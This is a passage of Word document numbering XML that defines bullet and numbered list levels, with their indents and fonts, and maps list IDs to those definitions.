          <w:tab w:val="num" w:pos="1647"/>
        </w:tabs>
        <w:ind w:left="1647" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="709"/>
        </w:tabs>
        <w:ind w:left="2547" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:lang w:val="uk-UA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3087"/>
        </w:tabs>
        <w:ind w:left="3087" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3807"/>
        </w:tabs>
        <w:ind w:left="3807" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4527"/>
        </w:tabs>
        <w:ind w:left="4527" w:hanging="180"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5247"/>
        </w:tabs>
        <w:ind w:left="5247" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5967"/>
        </w:tabs>
        <w:ind w:left="5967" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6687"/>
        </w:tabs>
        <w:ind w:left="6687" w:hanging="180"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="00000003"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C038DD10"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:nsid w:val="07B90017"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94D8C026"/>
    <w:lvl w:ilvl="0" w:tplc="1128B37C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1789" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090011">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="29C60F90">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2340" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      </w:r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8BC360C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C680B4F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0BFF551A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="39AE2050"/>
    <w:lvl w:ilvl="0" w:tplc="C038DD10">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>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0E5467CB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5EF67CB0"/>
    <w:lvl w:ilvl="0" w:tplc="8FD41FAE">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nsid w:val="0F986DCE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B5864FF6"/>
    <w:lvl w:ilvl="0" w:tplc="C038DD10">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:sz w:val="28"/>
        <w:szCs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0A134CD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A6604B10"/>
    <w:lvl w:ilvl="0" w:tplc="8FD41FAE">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nsid w:val="144B4520"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2EBE7524"/>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0">
    <w:nsid w:val="15620C65"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="632ACE78"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="Open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15C60E30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F0D6013E"/>
    <w:lvl w:ilvl="0" w:tplc="8FD41FAE">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nsid w:val="1E7518BC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="55808DE4"/>
    <w:lvl w:ilvl="0" w:tplc="8FD41FAE">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22B95193"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="47F85BD6"/>
    <w:lvl w:ilvl="0" w:tplc="8FD41FAE">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nsid w:val="25586216"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="71845A34"/>
    <w:lvl w:ilvl="0" w:tplc="C038DD10">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:sz w:val="28"/>
        <w:szCs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2C1D06F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8AE2578"/>
    <w:lvl w:ilvl="0" w:tplc="8FD41FAE">
      <w:start w:val="1"/>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6">
    <w:nsid w:val="2C6D7ECE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4ED24E26"/>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russianLower"/>
      <w:lvlText w:val="%3)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>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2CE63EE3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B9EC2DCE"/>
    <w:lvl w:ilvl="0" w:tplc="C038DD10">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:sz w:val="28"/>
        <w:szCs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37765CD8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="20FEF652"/>
    <w:lvl w:ilvl="0" w:tplc="62804198">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CF022A42" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A94447F2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="871A77E8" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9274DC14" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="66C2A3F2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E74AC6B0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="FA08BBC2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="982E98C4" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6480"/>
        </w:tabs>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="19">
    <w:nsid w:val="3AF04233"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CBBEB02C"/>
    <w:lvl w:ilvl="0" w:tplc="FCB2BCA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="DAF45F66" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="30FA4B76" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7E2E2A06" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="B658E07C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="80AA5768" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9EC810D0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="410E473E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="96B40970" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6480"/>
        </w:tabs>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20">
    <w:nsid w:val="425F66EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2020F44C"/>
    <w:lvl w:ilvl="0" w:tplc="C038DD10">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>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nsid w:val="44F66496"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2592C52C"/>
    <w:lvl w:ilvl="0" w:tplc="8FD41FAE">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nsid w:val="49712618"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CA9C4CC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4B7E6F51"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7B07EEA"/>
    <w:lvl w:ilvl="0" w:tplc="8FD41FAE">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nsid w:val="567757B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0E52CC30"/>
    <w:lvl w:ilvl="0" w:tplc="C038DD10">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>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nsid w:val="58794FDE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A9645EC"/>
    <w:lvl w:ilvl="0" w:tplc="8FD41FAE">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nsid w:val="617D44BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0868E48E"/>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63312073"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1DD6FA74"/>
    <w:lvl w:ilvl="0" w:tplc="C038DD10">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2149" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>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28">
    <w:nsid w:val="645447CC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="274881A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6B696142"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3898ABC4"/>
    <w:lvl w:ilvl="0" w:tplc="0422000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="1"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04220019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:pStyle w:val="2"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0422001B">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:pStyle w:val="3"/>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nsid w:val="6E016FB9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A05A49AE"/>
    <w:lvl w:ilvl="0" w:tplc="8FD41FAE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1503" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04220003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2223" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04220005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2943" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04220001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3663" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04220003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4383" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04220005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5103" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="04220001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5823" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04220003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6543" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04220005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7263" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="31">
    <w:nsid w:val="746933E6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="87A42E1E"/>
    <w:lvl w:ilvl="0" w:tplc="C038DD10">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:p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75436470"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="08ECA5A2"/>
    <w:lvl w:ilvl="0" w:tplc="CFC8DB82">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1211" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts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nsid w:val="75FB7C39"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53BCAA98"/>
    <w:lvl w:ilvl="0" w:tplc="C038DD10">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>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4">
    <w:nsid w:val="79F20C65"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="71B0C848"/>
    <w:lvl w:ilvl="0" w:tplc="8FD41FAE">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8FD41FAE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2869" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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
    <w:nsid w:val="7CB20324"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3F506FF2"/>
    <w:lvl w:ilvl="0" w:tplc="8FD41FAE">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29"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7">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15"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="15">
